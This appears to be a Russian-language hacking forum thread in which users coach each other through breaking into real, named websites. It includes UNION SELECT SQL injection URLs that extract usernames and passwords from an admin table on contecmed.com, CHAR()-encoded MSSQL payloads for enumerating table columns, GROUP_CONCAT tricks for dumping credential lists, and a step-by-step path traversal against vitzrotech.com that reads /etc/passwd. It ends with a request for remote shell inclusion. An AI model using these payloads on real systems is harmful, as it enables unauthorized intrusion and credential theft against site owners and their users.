Мы по твоему кто? Экстрасенсы? Мы не можем знать, делал ты так или нет. Если бы кинул ссылку - все было бы гораздо проще. А то знаешь, как бывает... Помогаешь человеку сделать вывод таблиц из information_schema, и после долгих дискуссий он тебе кидает в личку ссылку, смотришь version()... ЗЫ: Кинь ссылку в личку.
если есть вывод or 1=@@version, возможно )--+, как уже сказали выше без ссылки можно долго прыгать вокруг скули с бубном /add попробуй (select+top+1+column_name+from+information _schema.columns+where+table_name='t')
разве mssql принимает значения в хексе, начинающиеся с 0x? От фильтрации кавычек помогает char(), но никак не хекс как для MySQL. Сомневаюсь, что дело именно в кавычках, но стоит попробовать так: (select+top+1+column_name+from+information _schema.columns+where+table_name=CHAR(116)%2BCHAR(98)%2BCHAR(108)%2BCHAR(65)%2BCHAR(99)%2BCHAR(99)%2BCHAR(111)%2BCHAR(117)%2BCHAR(110)%2BCHAR(116)%2BCHAR(115)) Кстати в mssql пробел после -- не нужен
Подскажите, можно ли такое сделать. Вывожу инфу: group_concat(name,0x3a,pass,0x3a,city) Выплывает это все одной большой партянкой и все слитно, то есть все записи в одной строке через двоеточие, пример: admin:admin:belmor:root:root:belmor - ну и так далее! вопрос: Можно ли вывести информацию, что бы каждая записи выводилась с новой строки: admin:admin:belmor root:root:belmor Thx.
Это Microsoft Access. Code: http://www.contecmed.com/cart/product_show.asp?id=38+and+1=1+union+select+1,2,3,4,5,6,7,8,9,0,11,12+from+news Хм.. ну попробуй group_concat(name,0x3a,pass,0x3a,city,0x0a) Не всегда работает..
Code: http://www.contecmed.com/cart/product_show.asp?id=-37+or+1=1+union+select+1,2,3,4,5,6,7,pass,9,user,11,12+from+admin
не обратил внимания (скопировал запрос выше), имелось (предполагалась) ввиду не фильтровация ковычек, а в пропавшая после -- ' <=> near ''' & near 'accid', суть была в том что бы закрыть предыдущее условие/подзапрос; ступил, т.к. можно было его и не закрывать-- (работать с этим условием) насчет пробела, маслом кашу не испортишь, привычка с mysql
SELECT GROUP_CONCAT(CONCAT(name,0x3a,pass,0x3a,city) SEPARATOR 0×0a) FROM users SELECT GROUP_CONCAT(CONCAT(name,0x3a,pass,0x3a,city) SEPARATOR 0x3C62723E) FROM users
привет всем! хочу спросить по поводу php inj, прочитал много статей так и не могу реально взломать сайт..не подскажите как(что нужно) и с чего начать?
с sql инъекциями я разобрался....и зачем мне брать уже ломаные меня интересует...самому взломать, но я не могу не получается! вот и прошу чтоб кто нить реально помог раскрутить! взять любую php inj и раскрутить заново)
Так в чем проблема-то? Если ты читал статьи? Берём сайт. Code: http://vitzrotech.com Находим "интересную" ссылку Code: http://vitzrotech.com/english/ourproducts/mcb/link.php?file=mcb2.htm Пробуем: Code: http://vitzrotech.com/english/ourproducts/mcb/link.php?file=blablabla Читаем /etc/passwd Code: http://vitzrotech.com/english/ourproducts/mcb/link.php?file=../../../../../../../../etc/passwd
за это спасибо..но есть еще два вопроса....скоко надо поставить ../../../../../../../../../../ после file= , и видел по видео подставляют свои ссылки нс шеллом...что нить в этом роде не мог ли бы показать??
чем больше тем лутчше, шучу ., /../ - подняться на 1-у дирикторию верх, смотришь скока у тебя от твоего местоположения до требуемой диры ну и ставишь необходимое количество.
спс и за это..понял!! а как на счет этого-- видел по видео подставляют свои ссылки нс шеллом...что нить в этом роде не мог ли бы показать??
